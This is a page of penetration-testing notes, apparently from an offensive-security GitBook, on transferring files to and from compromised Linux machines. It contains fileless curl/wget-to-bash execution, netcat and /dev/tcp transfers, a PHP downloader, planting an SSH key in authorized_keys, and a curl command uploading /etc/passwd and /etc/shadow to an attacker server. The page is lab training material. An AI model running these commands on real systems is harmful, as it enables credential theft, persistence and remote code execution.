> For the complete documentation index, see [llms.txt](https://lswsec.gitbook.io/lswsec-offensive/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://lswsec.gitbook.io/lswsec-offensive/file-transfer/transferring-files/transferring-files-linux.md).

# Transferring Files - Linux

### Base64 Encoding/Decoding <a href="#web-servers" id="web-servers"></a>

**Pwnbox - Check File MD5 hash**

```shell-session
$ md5sum id_rsa

4e301756a07ded0a2dd6953abf015278  id_rsa
```

**Pwnbox - Encode SSH Key to Base64**

```shell-session
$ cat id_rsa |base64 -w 0;echo

LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUFsd0FBQUFkemMyZ3RjbgpOaEFBQUFBd0VBQVFBQUFJRUF6WjE0dzV1NU9laHR5SUJQSkg3Tm9Yai84YXNHRUcxcHpJbmtiN2hIMldRVGpMQWRYZE9kCno3YjJtd0tiSW56VmtTM1BUR3ZseGhDVkRRUmpBYzloQ3k1Q0duWnlLM3U2TjQ3RFhURFY0YUtkcXl0UTFUQXZZUHQwWm8KVWh2bEo5YUgxclgzVHUxM2FRWUNQTVdMc2JOV2tLWFJzSk11dTJONkJoRHVmQThhc0FBQUlRRGJXa3p3MjFwTThBQUFBSApjM05vTFhKellRQUFBSUVBeloxNHc1dTVPZWh0eUlCUEpIN05vWGovOGFzR0VHMXB6SW5rYjdoSDJXUVRqTEFkWGRPZHo3CmIybXdLYkluelZrUzNQVEd2bHhoQ1ZEUVJqQWM5aEN5NUNHblp5SzN1Nk40N0RYVERWNGFLZHF5dFExVEF2WVB0MFpvVWgKdmxKOWFIMXJYM1R1MTNhUVlDUE1XTHNiTldrS1hSc0pNdXUyTjZCaER1ZkE4YXNBQUFBREFRQUJBQUFBZ0NjQ28zRHBVSwpFdCtmWTZjY21JelZhL2NEL1hwTlRsRFZlaktkWVFib0ZPUFc5SjBxaUVoOEpyQWlxeXVlQTNNd1hTWFN3d3BHMkpvOTNPCllVSnNxQXB4NlBxbFF6K3hKNjZEdzl5RWF1RTA5OXpodEtpK0pvMkttVzJzVENkbm92Y3BiK3Q3S2lPcHlwYndFZ0dJWVkKZW9VT2hENVJyY2s5Q3J2TlFBem9BeEFBQUFRUUNGKzBtTXJraklXL09lc3lJRC9JQzJNRGNuNTI0S2NORUZ0NUk5b0ZJMApDcmdYNmNoSlNiVWJsVXFqVEx4NmIyblNmSlVWS3pUMXRCVk1tWEZ4Vit0K0FBQUFRUURzbGZwMnJzVTdtaVMyQnhXWjBNCjY2OEhxblp1SWc3WjVLUnFrK1hqWkdqbHVJMkxjalRKZEd4Z0VBanhuZEJqa0F0MExlOFphbUt5blV2aGU3ekkzL0FBQUEKUVFEZWZPSVFNZnQ0R1NtaERreWJtbG1IQXRkMUdYVitOQTRGNXQ0UExZYzZOYWRIc0JTWDJWN0liaFA1cS9yVm5tVHJRZApaUkVJTW84NzRMUkJrY0FqUlZBQUFBRkhCc1lXbHVkR1Y0ZEVCamVXSmxjbk53WVdObEFRSURCQVVHCi0tLS0tRU5EIE9QRU5TU0ggUFJJVkFURSBLRVktLS0tLQo=
```

**Linux - Decode the File**

```shell-session
$ echo -n 'LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUFsd0FBQUFkemMyZ3RjbgpOaEFBQUFBd0VBQVFBQUFJRUF6WjE0dzV1NU9laHR5SUJQSkg3Tm9Yai84YXNHRUcxcHpJbmtiN2hIMldRVGpMQWRYZE9kCno3YjJtd0tiSW56VmtTM1BUR3ZseGhDVkRRUmpBYzloQ3k1Q0duWnlLM3U2TjQ3RFhURFY0YUtkcXl0UTFUQXZZUHQwWm8KVWh2bEo5YUgxclgzVHUxM2FRWUNQTVdMc2JOV2tLWFJzSk11dTJONkJoRHVmQThhc0FBQUlRRGJXa3p3MjFwTThBQUFBSApjM05vTFhKellRQUFBSUVBeloxNHc1dTVPZWh0eUlCUEpIN05vWGovOGFzR0VHMXB6SW5rYjdoSDJXUVRqTEFkWGRPZHo3CmIybXdLYkluelZrUzNQVEd2bHhoQ1ZEUVJqQWM5aEN5NUNHblp5SzN1Nk40N0RYVERWNGFLZHF5dFExVEF2WVB0MFpvVWgKdmxKOWFIMXJYM1R1MTNhUVlDUE1XTHNiTldrS1hSc0pNdXUyTjZCaER1ZkE4YXNBQUFBREFRQUJBQUFBZ0NjQ28zRHBVSwpFdCtmWTZjY21JelZhL2NEL1hwTlRsRFZlaktkWVFib0ZPUFc5SjBxaUVoOEpyQWlxeXVlQTNNd1hTWFN3d3BHMkpvOTNPCllVSnNxQXB4NlBxbFF6K3hKNjZEdzl5RWF1RTA5OXpodEtpK0pvMkttVzJzVENkbm92Y3BiK3Q3S2lPcHlwYndFZ0dJWVkKZW9VT2hENVJyY2s5Q3J2TlFBem9BeEFBQUFRUUNGKzBtTXJraklXL09lc3lJRC9JQzJNRGNuNTI0S2NORUZ0NUk5b0ZJMApDcmdYNmNoSlNiVWJsVXFqVEx4NmIyblNmSlVWS3pUMXRCVk1tWEZ4Vit0K0FBQUFRUURzbGZwMnJzVTdtaVMyQnhXWjBNCjY2OEhxblp1SWc3WjVLUnFrK1hqWkdqbHVJMkxjalRKZEd4Z0VBanhuZEJqa0F0MExlOFphbUt5blV2aGU3ekkzL0FBQUEKUVFEZWZPSVFNZnQ0R1NtaERreWJtbG1IQXRkMUdYVitOQTRGNXQ0UExZYzZOYWRIc0JTWDJWN0liaFA1cS9yVm5tVHJRZApaUkVJTW84NzRMUkJrY0FqUlZBQUFBRkhCc1lXbHVkR1Y0ZEVCamVXSmxjbk53WVdObEFRSURCQVVHCi0tLS0tRU5EIE9QRU5TU0ggUFJJVkFURSBLRVktLS0tLQo=' | base64 -d > id_rsa
```

**Linux - Confirm the MD5 Hashes Match**

```shell-session
$ md5sum id_rsa

4e301756a07ded0a2dd6953abf015278  id_rsa
```

### Fileless Attacks Using Linux

\
**Fileless Download with cURL**

```shell-session
$ curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash
```

**Fileless Download with wget**

```shell-session
$ wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3

Hello World!
```

### Web servers

`python3 -m http.server 8000` Start a local webserver

`wget http://10.10.14.1:8000/linpeas.sh` Download a file on the remote server from our local machine

`curl http://10.10.14.1:8000/linenum.sh -o linenum.sh` Download a file on the remote server from our local machine

### Netcat <a href="#netcat" id="netcat"></a>

netcat is a good way to transfer files if you do not have an interactive shell.

On attacking machine:

```bash
nc -lvp 4444 < file
```

On target machine:

```bash
nc 192.168.1.102 4444 > file
```

I have sometimes received this error:

```
This is nc from the netcat-openbsd package. An alternative nc is available
```

I have just run this command instead:

```
nc -l 1234 > file.sh
```

### With php <a href="#with-php" id="with-php"></a>

```
echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
```

### Ftp <a href="#ftp" id="ftp"></a>

If you have access to a ftp-client to can of course just use that. Remember, if you are uploading binaries you must use binary mode, otherwise the binary will become corrupted.

### Tftp <a href="#tftp" id="tftp"></a>

To use Tftp to transfer the file, run it interactively like this:

```
$ tftp 192.168.0.101
tftp> get myfile.txt
```

If that does not work, try this:

```
tftp 191.168.0.101 <<< "get shell5555.php shell5555.php"
```

#### SSH - SCP <a href="#ssh---scp" id="ssh---scp"></a>

If you are able to connect to a target through SSH, you can use this to transfer files.

So, in the `/home/user` directory you can find the hidden `.ssh` files by typing `ls -la`. Then you need to do two things.

1. Create a new keypair

You do that with:

```
ssh-keygen -t rsa -C "your_email@example.com"
```

then you enter a name for the key.

Enter file in which to save the key (/root/.ssh/id\_rsa): nameOfMyKey Enter passphrase (empty for no passphrase): Enter same passphrase again:

This will create two files, one called `nameOfMyKey` and another called `nameOfMyKey_pub`. The one with the `_pub` is of course your public key. And the other key is your private.

1. Add your public key to authorized\_keys.

Now you copy the content of `nameOfMyKey_pub`. On the compromised machine you go to `~/.ssh` and then run add the public key to the file authorized\_keys. Like this

```bash
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDQqlhJKYtL/r9655iwp5TiUM9Khp2DJtsJVW3t5qU765wR5Ni+ALEZYwqxHPNYS/kZ4Vdv..." > authorized_keys
```

1. Log in.

Now you should be all set to log in using your private key. Like this

```
ssh -i nameOfMyKey kim@192.168.1.103
```

#### SCP <a href="#scp" id="scp"></a>

Now we can copy files to a machine using `scp`

```
# Copy a file:
scp /path/to/source/file.ext username@192.168.1.101:/path/to/destination/file.ext

# Copy a directory:
scp -r /path/to/source/dir username@192.168.1.101:/path/to/destination
```

### SSH (HTB notes)

**Enabling the SSH Server**

```shell-session
$ sudo systemctl enable ssh
```

**Starting the SSH Server**

```shell-session
$ sudo systemctl start ssh
```

**Checking for SSH Listening Port**

```shell-session
$ netstat -lnpt
```

**Linux - Downloading Files Using SCP**

```shell-session
$ scp plaintext@192.168.49.128:/root/myroot.txt . 
```

### Download with Bash (/dev/tcp)

\
**Connect to the Target Webserver**

```shell-session
$ exec 3<>/dev/tcp/10.10.10.32/80
```

**HTTP GET Request**

```shell-session
$ echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3
```

**Print the Response**

\
`$ cat <&3`

## Upload Operations

Web Upload

**Pwnbox - Start Web Server**

```shell-session
$ sudo python3 -m pip install --user uploadserver
```

**Pwnbox - Create a Self-Signed Certificate**

```shell-session
$ openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'
```

**Pwnbox - Start Web Server**

```shell-session
$ mkdir https && cd https
```

```shell-session
$ sudo python3 -m uploadserver 443 --server-certificate ~/server.pem
```

**Linux - Upload Multiple Files**

```shell-session
$ curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure
```

### Alternative Web File Transfer Method

**Linux - Creating a Web Server with Python3**

`$ python3 -m http.server`

**Linux - Creating a Web Server with Python2.7**

```shell-session
$ python2.7 -m SimpleHTTPServer
```

**Linux - Creating a Web Server with PHP**

```shell-session
$ php -S 0.0.0.0:8000
```

**Linux - Creating a Web Server with Ruby**

```shell-session
$ ruby -run -e httpd . -p8000
```

**Download the File from the Target Machine onto the Pwnbox**

```shell-session
$ wget 192.168.49.128:8000/filetotransfer.txt
```

\
\
SCP Upload

```shell-session
$ scp /etc/passwd htb-student@10.129.86.90:/home/htb-student/
```
